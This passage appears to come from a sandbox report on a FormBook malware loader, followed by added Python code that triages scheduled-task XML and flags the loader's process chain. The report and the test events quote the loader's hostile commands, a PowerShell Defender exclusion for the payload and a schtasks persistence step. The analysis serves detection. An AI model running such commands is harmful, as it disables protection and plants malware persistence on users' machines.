            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522BF0 NtAllocateVirtualMemory, 6_2_01522BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522BE0 NtQueryValueKey, 6_2_01522BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522B80 NtQueryInformationFile, 6_2_01522B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522BA0 NtEnumerateValueKey, 6_2_01522BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522AD0 NtReadFile, 6_2_01522AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522AF0 NtWriteFile, 6_2_01522AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522AB0 NtWaitForSingleObject, 6_2_01522AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522D10 NtMapViewOfSection, 6_2_01522D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522D00 NtSetInformationFile, 6_2_01522D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522D30 NtUnmapViewOfSection, 6_2_01522D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522DD0 NtDelayExecution, 6_2_01522DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522DB0 NtEnumerateKey, 6_2_01522DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522C60 NtCreateKey, 6_2_01522C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522C00 NtQueryInformationProcess, 6_2_01522C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522CC0 NtQueryVirtualMemory, 6_2_01522CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522CF0 NtOpenProcess, 6_2_01522CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522CA0 NtQueryInformationToken, 6_2_01522CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522F60 NtCreateProcessEx, 6_2_01522F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522F30 NtCreateSection, 6_2_01522F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522FE0 NtCreateFile, 6_2_01522FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522F90 NtProtectVirtualMemory, 6_2_01522F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522FB0 NtResumeThread, 6_2_01522FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522FA0 NtQuerySection, 6_2_01522FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522E30 NtWriteVirtualMemory, 6_2_01522E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522EE0 NtQueueApcThread, 6_2_01522EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522E80 NtReadVirtualMemory, 6_2_01522E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522EA0 NtAdjustPrivilegesToken, 6_2_01522EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01523010 NtOpenDirectoryObject, 6_2_01523010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01523090 NtSetValueKey, 6_2_01523090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015239B0 NtGetContextThread, 6_2_015239B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01523D70 NtOpenThread, 6_2_01523D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01523D10 NtOpenProcessToken, 6_2_01523D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010C68B813_2_010C68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0110E8F013_2_0110E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E38E013_2_010E38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FFB8013_2_010FFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01155BF013_2_01155BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111DBF913_2_0111DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01153A6C13_2_01153A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010DEA8013_2_010DEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010EAD0013_2_010EAD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E3D4013_2_010E3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010EED7A13_2_010EED7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010F8DBF13_2_010F8DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E8DC013_2_010E8DC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FFDC013_2_010FFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010DADE013_2_010DADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E0C0013_2_010E0C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01159C3213_2_01159C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010F9C2013_2_010F9C20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010D0CF213_2_010D0CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01100F3013_2_01100F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01122F2813_2_01122F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01154F4013_2_01154F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E1F9213_2_010E1F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0115EFA013_2_0115EFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010D2FC813_2_010D2FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E0E5913_2_010E0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010F2E9013_2_010F2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E9EB013_2_010E9EB0
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_03296BC816_2_03296BC8
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328E11816_2_0328E118
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328495916_2_03284959
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0329009816_2_03290098
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328FE6F16_2_0328FE6F
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328FE7816_2_0328FE78
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_032AE64816_2_032AE648
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01127E54 appears 96 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0114EA12 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01537E54 appears 99 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0155EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01525130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014DB970 appears 262 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0156F290 appears 103 times
            Source: JeouiaPf03mHSBH.exe | Static PE information: invalid certificate
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777152798.00000000063E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMML.dll2 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1772198461.00000000045FE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000000.1669536601.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRAwd.exe: vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1771673685.0000000003421000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMML.dll2 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1769943493.000000000143E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1778920802.0000000009860000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe | Binary or memory string: OriginalFilenameRAwd.exe: vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Matched Yara rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            The rule matched in each of the following sources:
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: JeouiaPf03mHSBH.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: snTlRrBza.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, upI346SlGxxHgqWU2Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, upI346SlGxxHgqWU2Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, upI346SlGxxHgqWU2Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@24/12@5/4
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | File created: C:\Users\user\AppData\Roaming\snTlRrBza.exe
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Mutant created: \Sessions\1\BaseNamedObjects\WhLpISOH
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | File created: C:\Users\user\AppData\Local\Temp\tmpA933.tmp
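            The tmpA933.tmp file created above is the task definition that the dropper hands to schtasks.exe /Create /XML a moment later (see the process list further down). The report does not reproduce its content, so the following is an added example rather than anything recovered from the sample: a Python triage helper that parses a Task Scheduler XML definition and extracts what a responder checks first, namely the triggers and any repetition interval, the executed command and whether it sits in a user-writable path, the Hidden flag, and the principal's run level. The sample XML is constructed to match the observed command line (a task named under Updates\ that runs the %APPDATA% copy); the USER_WRITABLE path fragments and the is_suspicious heuristic are assumptions, not anything the report states.

```python
import xml.etree.ElementTree as ET

# Namespace of every Task Scheduler XML definition consumed by schtasks /Create /XML
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: path fragments from which no legitimate "update" task should execute
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def triage_task_xml(xml_text):
    """Pull the persistence-relevant facts out of a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    triggers_el = root.find("t:Triggers", NS)
    children = list(triggers_el) if triggers_el is not None else []
    # Child tag names (LogonTrigger, TimeTrigger, ...) with the namespace stripped
    triggers = [child.tag.split("}")[-1] for child in children]
    repetition = [(el.text or "").strip()
                  for el in root.findall("t:Triggers//t:Repetition/t:Interval", NS)]
    actions = [(ex.findtext("t:Command", default="", namespaces=NS).strip(),
                ex.findtext("t:Arguments", default="", namespaces=NS).strip())
               for ex in root.findall("t:Actions/t:Exec", NS)]
    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "triggers": triggers,
        "repetition": repetition,
        "actions": actions,
        "hidden": text("t:Settings/t:Hidden").lower() == "true",
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "logon_type": text("t:Principals/t:Principal/t:LogonType"),
        "user_writable_action": any(frag in cmd.lower()
                                    for cmd, _ in actions for frag in USER_WRITABLE),
    }


def is_suspicious(report):
    """Assumed heuristic: a task that runs from a user-writable path or hides itself."""
    return report["user_writable_action"] or report["hidden"]


def load_task_file(path):
    """Task XML written by Windows is UTF-16 with a BOM; expat detects that from raw bytes."""
    with open(path, "rb") as fh:
        return triage_task_xml(fh.read())


# Constructed sample, not the recovered tmpA933.tmp: shaped like a .NET loader's task
# that re-launches the %APPDATA% copy at logon and every minute.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>user</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <StartBoundary>2024-07-22T12:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Settings><Hidden>true</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\snTlRrBza.exe</Command></Exec>
  </Actions>
</Task>
"""
```

On a live host the same definitions can be read back from C:\Windows\System32\Tasks\Updates\snTlRrBza with load_task_file; a task whose Exec command points into AppData while Hidden is set is the combination this loader produces.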
            Source: JeouiaPf03mHSBH.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JeouiaPf03mHSBH.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002B14000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2464414597.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2464648659.0000000002B14000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | File read: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe:Zone.Identifier
            Source: unknown | Process created: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe"
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\snTlRrBza.exe C:\Users\user\AppData\Roaming\snTlRrBza.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Process created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Process created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
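            The process list above is the whole execution chain in one place: the dropper adds a Defender exclusion through PowerShell, registers a scheduled task from an XML in Temp, and starts RegSvcs.exe with no arguments as the host for the injected FormBook payload; a renamed copy under a random Program Files (x86) directory then starts SearchIndexer.exe from SysWOW64, which in turn starts firefox.exe. Each link is individually unusual, and together they are the signature of this loader. The following is an added example, not part of the Joe Sandbox report: Python detection logic run over constructed process-creation events (Sysmon Event ID 1 shape) built from that list, with one rule per link and a second pass that groups hits by process-tree root so the chain is scored as a whole. The PIDs, the placeholder parent 900 for processes the report attributes to "unknown", the benign control event, and the UNEXPECTED_BROWSER_PARENTS set are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 / EDR telemetry shape)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
# Assumption: Windows binaries that never legitimately launch a browser.
UNEXPECTED_BROWSER_PARENTS = {"searchindexer.exe", "regsvcs.exe", "svchost.exe"}


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _has_args(cmdline):
    """True if anything follows the (possibly quoted) image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.split(None, 1)[1] if " " in s else ""
    return rest.strip() != ""


def detect(events):
    """One rule per link of the chain seen in the report; returns every hit."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = _base(e.image)
        pname = _base(parent.image) if parent else ""
        cl = e.cmdline.lower()
        # Defender exclusion added from PowerShell (Add-MpPreference -ExclusionPath ...)
        if name == "powershell.exe" and "add-mppreference" in cl and "-exclusion" in cl:
            findings.append(Finding("defender_exclusion_added", e.pid, e.cmdline))
        # Scheduled task registered from an XML definition dropped in a Temp directory
        if name == "schtasks.exe" and "/create" in cl:
            m = re.search(r'/xml\s+(?:"([^"]+)"|(\S+))', e.cmdline, re.I)
            xml_path = (m.group(1) or m.group(2)) if m else ""
            if "\\temp\\" in xml_path.lower():
                findings.append(Finding("schtasks_xml_from_temp", e.pid, xml_path))
        # RegSvcs.exe does nothing useful without arguments; started that way by a
        # binary outside C:\Windows it is an injection host, not a .NET install step
        if (name == "regsvcs.exe" and not _has_args(e.cmdline) and parent
                and not parent.image.lower().startswith("c:\\windows\\")):
            findings.append(Finding("regsvcs_no_args_from_user_binary", e.pid, parent.image))
        # SearchIndexer.exe is a service whose legitimate parent is services.exe
        if name == "searchindexer.exe" and pname != "services.exe":
            findings.append(Finding("searchindexer_unexpected_parent", e.pid,
                                    parent.image if parent else str(e.ppid)))
        # A browser launched by a system binary that has no reason to do so
        if name in BROWSERS and pname in UNEXPECTED_BROWSER_PARENTS:
            findings.append(Finding("browser_spawned_by_system_binary", e.pid, pname))
    return findings


def _root(by_pid, pid):
    """Walk ppid links up to the first process whose parent is outside the event set."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def score_chains(events, findings):
    """Group hits by process-tree root; several distinct rules on one root is the chain."""
    by_pid = {e.pid: e for e in events}
    chains = {}
    for f in findings:
        chains.setdefault(_root(by_pid, f.pid), set()).add(f.rule)
    return chains


# Constructed events modelled on the process list above. PIDs are invented and
# 900 stands in for the parent the report lists as "unknown".
EVENTS = [
    ProcEvent(1000, 900, r"C:\Users\user\Desktop\JeouiaPf03mHSBH.exe",
              r'"C:\Users\user\Desktop\JeouiaPf03mHSBH.exe"'),
    ProcEvent(1001, 1000, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"'),
    ProcEvent(1002, 1000, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"'),
    ProcEvent(1003, 1000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
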